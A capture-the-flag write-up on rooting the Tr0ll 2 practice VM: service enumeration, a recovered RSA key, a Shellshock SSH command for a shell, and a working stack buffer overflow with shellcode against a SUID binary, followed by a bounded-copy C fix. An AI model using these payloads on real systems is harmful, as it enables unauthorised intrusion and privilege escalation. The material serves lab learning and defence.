I rooted Tr0ll 1, so I thought it would be rude not to try the second VM in the Tr0ll series… Tr0ll 2 requires a buffer overflow to perform local escalation, whereas the first VM didn’t require any exploitation. However, like the first VM, I’d say this challenge is more a case of guessing credentials and trying things you think probably won’t work.
Description
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)
Difficulty is beginner++ to intermediate.
## Enumeration
Enumeration process started.
nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6
root:~# nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-02 19:24 EST
Host is up (0.0026s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.8
Network Distance: 2 hops
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
### Service Enumeration
Port | Service | Version Detection
---|---|---
21/tcp | FTP | vsftpd 2.0.8 or later
22/tcp | SSH | OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp | HTTP | Apache httpd 2.2.22 ((Ubuntu))
### SSH Enumeration
Zoning out watching my Nmap scan complete, I noticed the hostname was Tr0ll. I attempted to log in via SSH with the username Tr0ll and the password Tr0ll, and it worked! But I instantly got booted off; I tried a few things and nothing worked… So I tried FTP.
### FTP Enumeration
I tried the same credentials against FTP and discovered a file called “noob” in the FTP root.
ftp noob
root:~# ftp 172.31.31.6
Connected to 172.31.31.6
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (172.31.31.6:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get lmao.zip
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
1474 bytes received in 0.02 secs (60.6 kB/s)
ftp> exit
221 Goodbye.
Attempting to extract lmao.zip failed, prompting for a noob password.
Onto the next service then…
### HTTP Enumeration
Web browser showed:
nmap --script=http-enum -p80 -n 172.31.31.6
root:~# nmap --script=http-enum -p80 -n 172.31.31.6
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-2 18:40 GMT
Nmap scan report for 172.31.31.6
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /robots.txt: Robots file
Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
Entering /robots.txt url in the browser rendered:
User-agent:*
Disallow:
/noob
/nope
/try_harder
/keep_trying
/isnt_this_annoying
/nothing_here
/404
/LOL_at_the_last_one
/trolling_is_fun
/zomg_is_this_it
/you_found_me
/I_know_this_sucks
/You_could_give_up
/dont_bother
/will_it_ever_end
/I_hope_you_scripted_this
/ok_this_is_it
/stop_whining
/why_are_you_still_looking
/just_quit
/seriously_stop
The leading slash was stripped off with sed: sed 's./..g' robots.txt
dirb was then used with the result as a wordlist to check the following URLs.
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Sat Jan 3 08:08:15 2015
URL_BASE: http://172.31.31.6/
WORDLIST_FILES: robots.txt
-----------------
GENERATED WORDS: 21
---- Scanning URL: http://172.31.31.6/ ----
+ http://172.31.31.6//noob (CODE:301|SIZE:309)
+ http://172.31.31.6//keep_trying (CODE:301|SIZE:316)
+ http://172.31.31.6//dont_bother (CODE:301|SIZE:316)
+ http://172.31.31.6//ok_this_is_it (CODE:301|SIZE:318)
-----------------
DOWNLOADED: 21 - FOUND: 4
They all rendered the same image (after a 301 redirect).
Nothing exciting was in the page source, just:
What did you really think to find here? Try Harder
The image, cat_the_troll.jpg, was downloaded from each of the above locations on the target and examined.
ls -la showed a slightly different file size for one of the images, so I began by running each of the files through cat (cating the cat? Sorry). The odd one out contained the string:
Look Deep within y0ur_self for the answer
I tried this against the previously downloaded lmao.zip file, with no luck. I then tried y0ur_self as a web path, like on Tr0ll 1.
Success: the web directory contained a text file, http://172.31.31.6/y0ur_self/answer.txt
Scrolling through it in the browser, it looked like the file was base64 encoded.
wget http://172.31.31.6/y0ur_self/answer.txt
root:~# wget http://172.31.31.6/y0ur_self/answer.txt
Decoding the file revealed it was massive, so the following was used to decode it and sort the result by line length:
base64 decoding
root:~# base64 -d answer.txt > answer-decoded.txt && awk '{print length, $0;}' answer-decoded.txt | sort -nr | less
30 ItCantReallyBeThisEasyRightLOL
The top line looked promising: ItCantReallyBeThisEasyRightLOL
I tried this against lmao.zip
unzip lmao.zip
root:~# unzip lmao.zip
Archive: lmao.zip[lmao.zip] noob password:
inflating: noob
Yes!
The contents of noob
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq
yDSPjrmPsyFePcpHmwWEdeR5AWIv/RmGZh0Q+Qh6vSPswix7//SnX/QHvh0CGhf1
/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD/fy11Th33KwmcsgnPo
q+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5
z+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy
e5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna
u+W3cSHrmgWi/Ge0Ht6tP193V8IzyD/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0
gvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq
UmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079
La35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec/j3Kvse2GrXJFhZ2IEDAfa0GXR
xgl4PyN8O0L+TgBNI/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP
aq/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW
K+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx
n48iIflln6u85KYEjQbHHkA3MdJBX2yYFp/w6pYtKfp15BDA8s4v9HMCgYEA0YcB
TEJvcW1XUT93ZsN+lOo/xlXDsf+9Njrci+G8l7jJEAFWptb/9ELc8phiZUHa2dIh
WBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv
ibsKq9kucenZOnT/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t
0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq
vKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh
ywLymdDOlq3TOZ+CySD4/wUCgYEAr/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG
th8mjrEwf/b/1yai2YEHn+QKUU5dCbOLOjr2We/Dcm6cue98IP4rHdjVlRS3oN9s
G9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye
q51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4/fC77+NO
vW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot/W3IiRlkobhO07p3nj601d+OgTjjgKG
zp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==
-----END RSA PRIVATE KEY-----
### SSH Shellshock
Attempting to log in using the discovered key failed, with a message saying TRY HARDER LOL!
I tried to feed it commands by tagging them on the end; the connection hung then dropped with no message.
I googled some Shellshock options and managed to spawn a shell with:
ssh -i noob noob@172.31.31.6 '() { :;}; /bin/bash'
shellshock ssh
root:~# ssh -i noob noob@172.31.31.6 '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
## Local Enumeration
I transferred my local enumeration script to the target, which disclosed the following odd setuid directories:
#########################################
## Sticky Bit ##
#########################################
drwsr-xr-x 3 root root 4096 Dec 29 19:00 /nothing_to_see_here
drwsr-xr-x 5 root root 4096 Oct 4 22:36 /nothing_to_see_here/choose_wisely
drwsr-xr-x 2 root root 4096 Oct 5 21:19 /nothing_to_see_here/choose_wisely/door2
drwsr-xr-x 2 root root 4096 Oct 5 21:18 /nothing_to_see_here/choose_wisely/door3
drwsr-xr-x 2 root root 4096 Oct 4 22:19 /nothing_to_see_here/choose_wisely/door1
Each of the door directories contained a file called r00t. Running du -sh * in the parent dir choose_wisely showed one of the files was larger, so I started there.
od -S 1 r00t
was run against each of the files; the largest file contained:
0017545 bof.c
0017553 __init_array_end
0017574 _DYNAMIC
0017605 __init_array_start
0017630 _GLOBAL_OFFSET_TABLE_
0017656 __libc_csu_fini
0017676 __i686.get_pc_thunk.bx
0017725 data_start
0017740 printf@@GLIBC_2.0
0017762 _edata
0017771 _fini
0017777 strcpy@@GLIBC_2.0
0020021 __DTOR_END__
0020036 __data_start
0020053 __gmon_start__
0020072 exit@@GLIBC_2.0
0020112 __dso_handle
0020127 _IO_stdin_used
0020146 __libc_start_main@@GLIBC_2.0
0020203 __libc_csu_init
bof.c is a pretty good indication that a buffer overflow was the next logical step (unless it’s more tr0lling).
## Exploit Development
### Fuzzing
I started by fuzzing with 300 A’s:
fuzzing linux binary
root:~# ./r00t $(python -c 'print "A" *300')
Segmentation fault
Bangin’! Then I tried 250: no crash. Adding 10 each time, then subtracting, the segfault occurred at 268 and the instruction pointer was hit at 269 (Illegal instruction).
Using gdb I located the address of ESP.
(gdb) i r esp
esp 0xbffffb80 0xbffffb80
I padded with some NOPs for a reliable landing, overwrote EIP with the location of ESP and tagged some shellcode on the end to execute a shell.
### Final Exploit
./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
Note: gdb drops privileges on SUID, in order to spawn the new shell with SUID you need to execute the exploit outside of gdb, or the shell will spawn as the unprivileged user.
The binaries in choose_wisely/door* are rotated; the largest is the vulnerable binary.
Exploit Process
root:~# du -sh *
12K door1
12K door2
16K door3
root:~# cd door3
root:~# ./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
root:~# whoami
root
root:~# cat /root/Proof.txt
You win this time young Jedi...
a70354f0258dcc00292c72aab3c8b1e4
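The symbol table pulled out of r00t above (bof.c, strcpy@@GLIBC_2.0, a crash at 268 bytes) points at the classic unbounded strcpy of argv[1] into a fixed stack buffer. The C below is an added illustration, not the VM’s bof.c: it shows that pattern next to the bounded copy that would have stopped the 300-A fuzz string at the door. The 256-byte buffer size and the function names are my assumptions; the page only gives the 268-byte offset.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for illustration; the real r00t binary's size is not on the page.
 * On 32-bit x86 a 256-byte buffer plus alignment padding and the saved EBP is
 * consistent with EIP being reached after 268 bytes, but that is an inference. */
#define BUF_SIZE 256

/* The vulnerable pattern the symbol table suggests: no length check, so any
 * argument longer than BUF_SIZE overwrites the saved EBP and return address.
 * Present for comparison only; the self-test never calls it. */
int vulnerable_copy(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);              /* unbounded copy */
    return (int)strlen(buf);
}

/* Hardened replacement: measure first, reject anything that does not fit
 * (including its terminating NUL), then copy exactly the bytes that fit.
 * Returns the copied length, or -1 when the input is rejected. */
int bounded_copy(const char *input, char *out, size_t out_size) {
    size_t len = strlen(input);
    if (out_size == 0 || len >= out_size) {
        return -1;                   /* refuse rather than silently truncate */
    }
    memcpy(out, input, len + 1);     /* len + 1 includes the NUL; fits because len < out_size */
    return (int)len;
}

/* Same one-argument interface as r00t, built on the bounded copy.
 * Returns 0 on success and 1 when the argument is too long. */
int handle_arg(const char *arg) {
    char buf[BUF_SIZE];
    int n = bounded_copy(arg, buf, sizeof buf);
    if (n < 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    printf("%s\n", buf);
    return 0;
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    /* ./prog $(python -c 'print "A"*300') now exits with an error instead of a segfault */
    return handle_arg(argv[1]);
}
```

Rejecting rather than truncating matters here: a silently truncated argument would still "work" for the caller while hiding that an input arrived which was never expected, which is exactly the signal a fuzzing run like the one above relies on.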
## Root dance
## Thanks
Thanks to @maleus21 for creating this VM challenge.